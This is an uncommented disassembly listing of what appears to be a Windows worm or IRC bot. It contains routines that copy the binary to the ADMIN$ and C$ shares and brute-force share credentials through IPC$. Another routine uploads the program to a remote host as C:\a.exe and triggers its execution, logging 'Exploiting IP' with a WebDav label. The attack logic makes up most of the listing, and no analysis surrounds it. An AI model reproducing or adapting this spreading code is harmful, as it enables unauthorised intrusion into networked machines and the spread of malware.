lea eax, [ebp+var_2E8]
push eax
push 0FFFFFFFFh
push esi
push ebx
push ebx
mov [ebp+var_20], offset aAdminSystem32 ; "Admin$\\system32"
mov [ebp+var_1C], offset aCWinntSystem32 ; "c$\\winnt\\system32"
mov [ebp+var_18], offset aCWindowsSystem ; "c$\\windows\\system32"
mov [ebp+var_14], offset aC ; "c"
mov [ebp+var_10], offset aD ; "d"
mov [ebp+var_8], ebx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2E8]
push eax
call dword_43A30C
test eax, eax
jnz loc_4160F8
cmp [ebp+var_8], ebx
jz loc_4160F8
mov edi, dword_4220FC
mov [ebp+var_4], ebx
mov esi, offset byte_42FD48
loc_415F50: ; CODE XREF: sub_415E96+14F�j
mov eax, [ebp+var_4]
push esi
push [ebp+eax*4+var_20]
lea eax, [ebp+var_158]
push [ebp+arg_8]
push offset aSSS_3 ; "%s\\%s\\%s"
push eax
call sub_416905
add esp, 14h
push ebx
lea eax, [ebp+var_158]
push eax
push esi
call edi ; CopyFileA
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_415FFE
call dword_422004 ; RtlGetLastWin32Error
cmp eax, 5
jnz short loc_415FDE
lea eax, [ebp+var_158]
push ebx
push eax
call sub_417234
test eax, eax
pop ecx
pop ecx
jnz short loc_415FDE
lea eax, [ebp+var_158]
lea edx, [eax+1]
loc_415FA8: ; CODE XREF: sub_415E96+117�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_415FA8
sub eax, edx
mov [ebp+var_C], eax
call sub_41699A
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_C]
push ebx
add dl, 30h
mov [ebp+eax+var_15D], dl
lea eax, [ebp+var_158]
push eax
push esi
call edi ; CopyFileA
cmp eax, ebx
mov [ebp+var_C], eax
jnz short loc_415FFE
loc_415FDE: ; CODE XREF: sub_415E96+F4�j
; sub_415E96+107�j
inc [ebp+var_4]
cmp [ebp+var_4], 5
jb loc_415F50
cmp [ebp+var_C], ebx
jnz short loc_415FFE
push [ebp+var_8]
call dword_43A3D8
jmp loc_4160FB
; ---------------------------------------------------------------------------
loc_415FFE: ; CODE XREF: sub_415E96+E9�j
; sub_415E96+146�j ...
mov ecx, [ebp+var_8]
mov eax, [ecx]
push 3Ch
pop edi
xor edx, edx
div edi
xor edx, edx
lea edi, [ebp+var_34]
push 208h
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
xor eax, eax
stosd
stosd
stosd
stosd
lea eax, [ebp+var_6F0]
push eax
push 0FFFFFFFFh
push esi
push ebx
push ebx
imul edx, 0EA60h
mov [ebp+var_34], edx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp+var_6F0]
mov [ebp+var_28], eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2E8]
push eax
call dword_43A348
test eax, eax
jnz loc_4160F8
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov edi, 422B0Ah
mov esi, eax
xor edx, edx
repe cmpsb
jnz short loc_41607F
mov eax, offset aNoPassword ; "(no password)"
loc_41607F: ; CODE XREF: sub_415E96+1E2�j
push eax
push [ebp+arg_0]
mov eax, [ebp+var_4]
push [ebp+eax*4+var_20]
mov eax, [ebp+arg_B4]
push [ebp+arg_8]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingI_0 ; "[%s]: Exploiting IP: %s, Share: \\%s, Us"...
lea eax, [ebp+var_4E8]
push 200h
push eax
call sub_416B5D
add esp, 20h
cmp [ebp+arg_C0], ebx
jnz short loc_4160DA
push ebx
push [ebp+arg_BC]
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+arg_20]
push eax
push [ebp+arg_C]
call sub_405D20
add esp, 14h
loc_4160DA: ; CODE XREF: sub_415E96+225�j
lea eax, [ebp+var_4E8]
push eax
call sub_401ECD
mov eax, [ebp+arg_B4]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
pop ecx
loc_4160F8: ; CODE XREF: sub_415E96+9D�j
; sub_415E96+A6�j ...
xor ebx, ebx
inc ebx
loc_4160FB: ; CODE XREF: sub_415E96+48�j
; sub_415E96+163�j
push 1
push 1
push [ebp+arg_8]
call dword_43A378
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_415E96 endp
; =============== S U B R O U T I N E =======================================
sub_41610F proc near ; CODE XREF: .text:004162A7�p
; .text:0041631E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
cmp dword_42FF70, 0
push ebx
push esi
push edi
jz short loc_41616B
mov eax, offset dword_42FF70
mov ebx, eax
loc_416122: ; CODE XREF: sub_41610F+5A�j
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
push [esp+0C8h+arg_4]
lea esi, [esp+0CCh+arg_8]
push dword ptr [eax]
rep movsd
push [esp+0D0h+arg_0]
call sub_415E96
add esp, 0C8h
cmp eax, 1
jz short loc_416171
push 0C8h
call dword_422000 ; Sleep
add ebx, 4
cmp dword ptr [ebx], 0
mov eax, ebx
jnz short loc_416122
loc_41616B: ; CODE XREF: sub_41610F+A�j
xor eax, eax
loc_41616D: ; CODE XREF: sub_41610F+65�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_416171: ; CODE XREF: sub_41610F+45�j
xor eax, eax
inc eax
jmp short loc_41616D
sub_41610F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push eax
xor ebx, ebx
lea eax, [ebp-30h]
push offset aS_6 ; "\\\\%s"
push eax
mov [ebp-4], ebx
mov [ebp-14h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
call sub_416905
add esp, 0Ch
push 3E8h
lea eax, [ebp-62Ch]
push eax
push 0FFFFFFFFh
lea eax, [ebp-30h]
push eax
push ebx
push ebx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp-30h]
push eax
lea eax, [ebp-118h]
push offset aSIpc_0 ; "%s\\ipc$"
push eax
mov [ebp-40h], ebx
mov [ebp-34h], ebx
mov [ebp-4Ch], ebx
call sub_416905
add esp, 0Ch
lea eax, [ebp-118h]
mov [ebp-3Ch], eax
push ebx
mov eax, 422B0Ah
push eax
push eax
lea eax, [ebp-50h]
push eax
call dword_43A444
test eax, eax
jz short loc_416216
push 1
push ebx
lea eax, [ebp-118h]
push eax
call dword_43A378
xor eax, eax
jmp loc_41633E
; ---------------------------------------------------------------------------
loc_416216: ; CODE XREF: .text:004161FD�j
; .text:004162DE�j
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-14h]
push eax
push 0FFFFFFFFh
lea eax, [ebp-4]
push eax
push 2
push ebx
lea eax, [ebp-62Ch]
push eax
call dword_43A37C
push 1
mov [ebp-0Ch], eax
push ebx
lea eax, [ebp-118h]
push eax
call dword_43A378
cmp [ebp-0Ch], ebx
jz short loc_416259
cmp dword ptr [ebp-0Ch], 0EAh
jnz short loc_4162C6
loc_416259: ; CODE XREF: .text:0041624E�j
mov eax, [ebp-4]
cmp eax, ebx
mov [ebp-10h], eax
jz short loc_4162D7
cmp [ebp-14h], ebx
mov [ebp-8], ebx
jbe short loc_4162C6
loc_41626B: ; CODE XREF: .text:004162C4�j
mov eax, [ebp-10h]
cmp eax, ebx
jz short loc_4162C6
push ebx
push ebx
push 12Ch
lea ecx, [ebp-244h]
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call dword_4220D8 ; WideCharToMultiByte
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
lea eax, [ebp-30h]
push eax
lea eax, [ebp-244h]
lea esi, [ebp+8]
push eax
rep movsd
call sub_41610F
add esp, 0C4h
cmp eax, 1
jz short loc_4162C6
add dword ptr [ebp-10h], 4
inc dword ptr [ebp-8]
mov eax, [ebp-8]
cmp eax, [ebp-14h]
jb short loc_41626B
loc_4162C6: ; CODE XREF: .text:00416257�j
; .text:00416269�j ...
cmp [ebp-4], ebx
jz short loc_4162D7
push dword ptr [ebp-4]
call dword_43A3D8
mov [ebp-4], ebx
loc_4162D7: ; CODE XREF: .text:00416261�j
; .text:004162C9�j
cmp dword ptr [ebp-0Ch], 0EAh
jz loc_416216
cmp [ebp-4], ebx
jz short loc_4162F2
push dword ptr [ebp-4]
call dword_43A3D8
loc_4162F2: ; CODE XREF: .text:004162E7�j
cmp dword ptr [ebp-0Ch], 5
jnz short loc_41633B
cmp off_42FF20, ebx
jz short loc_41633B
mov eax, offset off_42FF20
mov [ebp-8], eax
loc_416308: ; CODE XREF: .text:00416339�j
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
lea esi, [ebp+8]
rep movsd
lea ecx, [ebp-30h]
push ecx
push dword ptr [eax]
call sub_41610F
add esp, 0C4h
cmp eax, 1
jz short loc_41633B
mov eax, [ebp-8]
add eax, 4
cmp [eax], ebx
mov [ebp-8], eax
jnz short loc_416308
loc_41633B: ; CODE XREF: .text:004162F6�j
; .text:004162FE�j ...
xor eax, eax
inc eax
loc_41633E: ; CODE XREF: .text:00416211�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 698h
and byte ptr [ebp-5], 0
lea eax, [ebp-508h]
push eax
push 202h
call dword_43A3AC ; WSAStartup
test eax, eax
jz short loc_41636A
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41636A: ; CODE XREF: .text:00416364�j
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push eax
call dword_43A414 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-60h], eax
call dword_43A4F4 ; ntohs
push 6
push 1
push 2
mov [ebp-62h], ax
mov word ptr [ebp-64h], 2
call dword_43A39C ; socket
push 10h
lea ecx, [ebp-64h]
push ecx
push eax
mov [ebp-4], eax
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jz loc_4167B9
mov ebx, 1F4h
loc_4163BA: ; CODE XREF: .text:0041644C�j
cmp byte ptr [ebp-5], 1
lea eax, [ebp-4Ch]
jnz short loc_4163CA
push offset a022moptestmv1_ ; "022OPtestv1.1\r\n"
jmp short loc_4163CF
; ---------------------------------------------------------------------------
loc_4163CA: ; CODE XREF: .text:004163C1�j
push offset a022moptestmv_0 ; "022OPtestv1.2\r\n"
loc_4163CF: ; CODE XREF: .text:004163C8�j
push eax
call sub_416905
pop ecx
lea eax, [ebp-4Ch]
pop ecx
lea edx, [eax+1]
loc_4163DD: ; CODE XREF: .text:004163E2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4163DD
push 0
sub eax, edx
push eax
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A438 ; send
mov esi, dword_422000
push ebx
call esi ; Sleep
push 10h
pop ecx
xor eax, eax
push eax
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A304 ; recv
lea eax, [ebp-4Ch]
push offset a001myourClient ; "001Your client version is outdated!"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz short loc_416457
push dword ptr [ebp-4]
mov byte ptr [ebp-5], 1
call dword_43A4B0 ; closesocket
push 10h
lea eax, [ebp-64h]
push eax
push dword ptr [ebp-4]
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jnz loc_4163BA
jmp loc_4167B9
; ---------------------------------------------------------------------------
loc_416457: ; CODE XREF: .text:0041642B�j
lea eax, [ebp-4Ch]
push offset a001m ; "001"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jnz short loc_4164DF
push ebx
call esi ; Sleep
cmp byte ptr [ebp-5], 1
lea eax, [ebp-4Ch]
jnz short loc_41647E
push offset a022mmv1_1 ; "022v1.1\r\n"
jmp short loc_416483
; ---------------------------------------------------------------------------
loc_41647E: ; CODE XREF: .text:00416475�j
push offset a022mmv1_2 ; "022v1.2\r\n"
loc_416483: ; CODE XREF: .text:0041647C�j
push eax
call sub_416905
pop ecx
lea eax, [ebp-4Ch]
pop ecx
lea edi, [eax+1]
loc_416491: ; CODE XREF: .text:00416496�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_416491
push 0
sub eax, edi
push eax
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A438 ; send
push ebx
call esi ; Sleep
push 10h
pop ecx
xor eax, eax
push eax
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A304 ; recv
lea eax, [ebp-4Ch]
push offset a001m ; "001"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz loc_4167B9
loc_4164DF: ; CODE XREF: .text:00416469�j
push 0
push 6
push offset a019m ; "019\r\n"
push dword ptr [ebp-4]
call dword_43A438 ; send
push ebx
call esi ; Sleep
push 10h
pop ecx
xor eax, eax
push eax
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A304 ; recv
push 7
mov edi, offset a020m ; "020\r\n"
lea esi, [ebp-4Ch]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_4167B9
push 41h
pop ecx
lea edi, [ebp-178h]
rep stosd
push 104h
lea eax, [ebp-178h]
push eax
xor esi, esi
push esi
call dword_42200C ; GetModuleFileNameA
lea eax, [ebp-178h]
push offset dword_422998
push eax
call sub_41719C
cmp eax, esi
pop ecx
pop ecx
mov [ebp-50h], eax
jz loc_4167B9
lea eax, [ebp-698h]
push eax
push 202h
call dword_43A3AC ; WSAStartup
test eax, eax
jnz loc_4167B9
lea eax, [ebp+0Ch]
push eax
call dword_43A414 ; inet_addr
push ebx
mov [ebp-70h], eax
call dword_43A4F4 ; ntohs
push 6
push 1
push 2
mov [ebp-72h], ax
mov word ptr [ebp-74h], 2
call dword_43A39C ; socket
push 10h
lea ecx, [ebp-74h]
push ecx
push eax
mov [ebp-0Ch], eax
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jz loc_4167B0
push esi
push 80h
push 3
push esi
push 1
push 80000000h
lea eax, [ebp-178h]
push eax
call dword_422034 ; CreateFileA
mov edi, eax
push esi
push edi
call dword_422094 ; GetFileSize
push edi
mov [ebp-54h], eax
call dword_42202C ; CloseHandle
push dword ptr [ebp-54h]
lea eax, [ebp-4Ch]
push offset aCA_exeD ; "C:\\a.exe\r\n%d\r\n"
push eax
call sub_416905
lea eax, [ebp-4Ch]
add esp, 0Ch
lea edi, [eax+1]
loc_416609: ; CODE XREF: .text:0041660E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_416609
push esi
sub eax, edi
push eax
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-0Ch]
call dword_43A438 ; send
push ebx
call dword_422000 ; Sleep
push 10h
pop ecx
xor eax, eax
push esi
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-0Ch]
call dword_43A304 ; recv
lea eax, [ebp-4Ch]
push offset aOkRedy ; "+OK REDY"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz loc_4167B0
push 10h
pop ecx
xor eax, eax
lea edi, [ebp-4Ch]
rep stosd
mov edi, [ebp-50h]
jmp short loc_416689
; ---------------------------------------------------------------------------
loc_416669: ; CODE XREF: .text:0041668D�j
push edi
push 40h
lea eax, [ebp-4Ch]
push 1
push eax
call sub_416F47
add esp, 10h
push esi
push eax
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-0Ch]
call dword_43A438 ; send
loc_416689: ; CODE XREF: .text:00416667�j
test byte ptr [edi+0Ch], 10h
jz short loc_416669
push 10h
pop ecx
xor eax, eax
push esi
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-0Ch]
call dword_43A304 ; recv
lea eax, [ebp-4Ch]
push offset aOkRcvd ; "+OK RCVD"
push eax
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz loc_4167B0
push dword ptr [ebp-0Ch]
call dword_43A4B0 ; closesocket
push esi
push 0Eh
push offset a008mcA_exe ; "008C:\\a.exe\r\n"
push dword ptr [ebp-4]
call dword_43A438 ; send
push ebx
call dword_422000 ; Sleep
push 10h
pop ecx
xor eax, eax
push esi
lea edi, [ebp-4Ch]
rep stosd
push 40h
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-4]
call dword_43A304 ; recv
push 1Bh
mov edi, offset a001merrorExecu ; "001Error Executing File\r\n"
lea esi, [ebp-4Ch]
pop ecx
xor eax, eax
repe cmpsb
jz loc_4167B0
xor esi, esi
push esi
push 6
push offset a100m ; "100\r\n"
push dword ptr [ebp-4]
call dword_43A438 ; send
push dword ptr [ebp-0Ch]
call dword_43A4B0 ; closesocket
push dword ptr [ebp-4]
call dword_43A4B0 ; closesocket
call dword_43A4BC ; WSACleanup
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-378h]
push 200h
push eax
call sub_416B5D
add esp, 14h
cmp [ebp+0BCh], esi
jnz short loc_41678D
push esi
push dword ptr [ebp+0B8h]
lea eax, [ebp-378h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_405D20
add esp, 14h
loc_41678D: ; CODE XREF: .text:0041676E�j
lea eax, [ebp-378h]
push eax
call sub_401ECD
mov eax, [ebp+0B0h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
xor eax, eax
pop ecx
inc eax
jmp short loc_4167CA
; ---------------------------------------------------------------------------
loc_4167B0: ; CODE XREF: .text:004165B8�j
; .text:00416654�j ...
push dword ptr [ebp-0Ch]
call dword_43A4B0 ; closesocket
loc_4167B9: ; CODE XREF: .text:004163AF�j
; .text:00416452�j ...
push dword ptr [ebp-4]
call dword_43A4B0 ; closesocket
call dword_43A4BC ; WSACleanup
xor eax, eax
loc_4167CA: ; CODE XREF: .text:004167AE�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4167D0 proc near ; CODE XREF: start+5C�p start+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_416894
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_4167FC
loc_4167EB: ; CODE XREF: sub_4167D0+2A�j
mov al, [edi]
add edi, 1
test al, al
jz short loc_41682D
test edi, 3
jnz short loc_4167EB
loc_4167FC: ; CODE XREF: sub_4167D0+19�j
; sub_4167D0+42�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_4167FC
mov eax, [edi-4]
test al, al
jz short loc_41683C
test ah, ah
jz short loc_416837
test eax, 0FF0000h
jz short loc_416832
test eax, 0FF000000h
jnz short loc_4167FC
loc_41682D: ; CODE XREF: sub_4167D0+22�j
sub edi, 1
jmp short loc_41683F
; ---------------------------------------------------------------------------
loc_416832: ; CODE XREF: sub_4167D0+54�j
sub edi, 2
jmp short loc_41683F
; ---------------------------------------------------------------------------
loc_416837: ; CODE XREF: sub_4167D0+4D�j
sub edi, 3
jmp short loc_41683F
; ---------------------------------------------------------------------------
loc_41683C: ; CODE XREF: sub_4167D0+49�j
sub edi, 4
loc_41683F: ; CODE XREF: sub_4167D0+60�j
; sub_4167D0+65�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_416854
mov ebx, ecx
shr ecx, 2
jnz short loc_4168AE
jmp short loc_416876
; ---------------------------------------------------------------------------
loc_416854: ; CODE XREF: sub_4167D0+79�j
; sub_4167D0+9D�j
mov dl, [esi]
add esi, 1
test dl, dl
jz short loc_41689A
mov [edi], dl
add edi, 1
sub ecx, 1
jz short loc_416890
test esi, 3
jnz short loc_416854
mov ebx, ecx
shr ecx, 2
jnz short loc_4168AE
loc_416876: ; CODE XREF: sub_4167D0+82�j
; sub_4167D0+DC�j
mov ecx, ebx
and ecx, 3
jz short loc_416890
loc_41687D: ; CODE XREF: sub_4167D0+BE�j
mov dl, [esi]
add esi, 1
mov [edi], dl
add edi, 1
test dl, dl
jz short loc_416892
sub ecx, 1
jnz short loc_41687D
loc_416890: ; CODE XREF: sub_4167D0+95�j
; sub_4167D0+AB�j
mov [edi], cl
loc_416892: ; CODE XREF: sub_4167D0+B9�j
pop ebx
pop esi
loc_416894: ; CODE XREF: sub_4167D0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41689A: ; CODE XREF: sub_4167D0+8B�j
; sub_4167D0+FA�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4168A4: ; CODE XREF: sub_4167D0+F6�j
; sub_4167D0+10E�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_416876
loc_4168AE: ; CODE XREF: sub_4167D0+80�j
; sub_4167D0+A4�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4168A4
test dl, dl
jz short loc_41689A
test dh, dh
jz short loc_4168FA
test edx, 0FF0000h
jz short loc_4168EA
test edx, 0FF000000h
jnz short loc_4168A4
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4168EA: ; CODE XREF: sub_4167D0+106�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4168FA: ; CODE XREF: sub_4167D0+FE�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4167D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416905 proc near ; CODE XREF: start+19�p start+48�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4189AC
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_416957
dec [ebp+var_1C]
js short loc_41694A
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_416957
; ---------------------------------------------------------------------------
loc_41694A: ; CODE XREF: sub_416905+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_418805
pop ecx
pop ecx
loc_416957: ; CODE XREF: sub_416905+36�j
; sub_416905+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_416905 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416960 proc near ; CODE XREF: sub_401141+2BB�p
; sub_409806+4527�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_416987
xor eax, eax
jmp short loc_416989
; ---------------------------------------------------------------------------
loc_416987: ; CODE XREF: sub_416960+21�j
mov eax, edi
loc_416989: ; CODE XREF: sub_416960+25�j
cld
pop edi
leave
retn
sub_416960 endp
; =============== S U B R O U T I N E =======================================
sub_41698D proc near ; CODE XREF: sub_401950+39�p
; sub_402B61+2E�p ...
arg_0 = dword ptr 4
call sub_41915F
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_41698D endp
; =============== S U B R O U T I N E =======================================
sub_41699A proc near ; CODE XREF: sub_401141+152�p
; sub_4017DA+57�p ...
call sub_41915F
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_41699A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4169C0 proc near ; CODE XREF: sub_401141+6E�p
; sub_401141+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_416A5F
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4169EC
shr ecx, 2
jnz loc_416A6F
jmp short loc_416A13
; ---------------------------------------------------------------------------
loc_4169EC: ; CODE XREF: sub_4169C0+1F�j
; sub_4169C0+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_416A26
test al, al
jz short loc_416A2E
test esi, 3
jnz short loc_4169EC
mov ebx, ecx
shr ecx, 2
jnz short loc_416A6F
loc_416A0E: ; CODE XREF: sub_4169C0+AD�j
and ebx, 3
jz short loc_416A26
loc_416A13: ; CODE XREF: sub_4169C0+2A�j
; sub_4169C0+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_416A58
sub ebx, 1
jnz short loc_416A13
loc_416A26: ; CODE XREF: sub_4169C0+39�j
; sub_4169C0+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_416A2E: ; CODE XREF: sub_4169C0+3D�j
test edi, 3
jz short loc_416A4C
loc_416A36: ; CODE XREF: sub_4169C0+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_416ADC
test edi, 3
jnz short loc_416A36
loc_416A4C: ; CODE XREF: sub_4169C0+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_416AC7
loc_416A53: ; CODE XREF: sub_4169C0+9B�j
; sub_4169C0+116�j
mov [edi], al
add edi, 1
loc_416A58: ; CODE XREF: sub_4169C0+5F�j
sub ebx, 1
jnz short loc_416A53
pop ebx
pop esi
loc_416A5F: ; CODE XREF: sub_4169C0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_416A65: ; CODE XREF: sub_4169C0+C7�j
; sub_4169C0+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_416A0E
loc_416A6F: ; CODE XREF: sub_4169C0+24�j
; sub_4169C0+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_416A65
test dl, dl
jz short loc_416AB9
test dh, dh
jz short loc_416AAF
test edx, 0FF0000h
jz short loc_416AA5
test edx, 0FF000000h
jnz short loc_416A65
mov [edi], edx
jmp short loc_416ABD
; ---------------------------------------------------------------------------
loc_416AA5: ; CODE XREF: sub_4169C0+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_416ABD
; ---------------------------------------------------------------------------
loc_416AAF: ; CODE XREF: sub_4169C0+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_416ABD
; ---------------------------------------------------------------------------
loc_416AB9: ; CODE XREF: sub_4169C0+CB�j
xor edx, edx
mov [edi], edx
loc_416ABD: ; CODE XREF: sub_4169C0+E3�j
; sub_4169C0+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_416AD3
loc_416AC7: ; CODE XREF: sub_4169C0+91�j
xor eax, eax
loc_416AC9: ; CODE XREF: sub_4169C0+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_416AC9
loc_416AD3: ; CODE XREF: sub_4169C0+105�j
and ebx, 3
jnz loc_416A53
loc_416ADC: ; CODE XREF: sub_4169C0+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4169C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416AE4 proc near ; CODE XREF: sub_4017DA+4A�p
; sub_404260+23C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_419D00
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
call sub_419255
add esp, 10h
leave
retn
sub_416AE4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416B20 proc near ; CODE XREF: sub_403FEB+8�p
; sub_405121+A�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_416B35
neg eax
add eax, esp
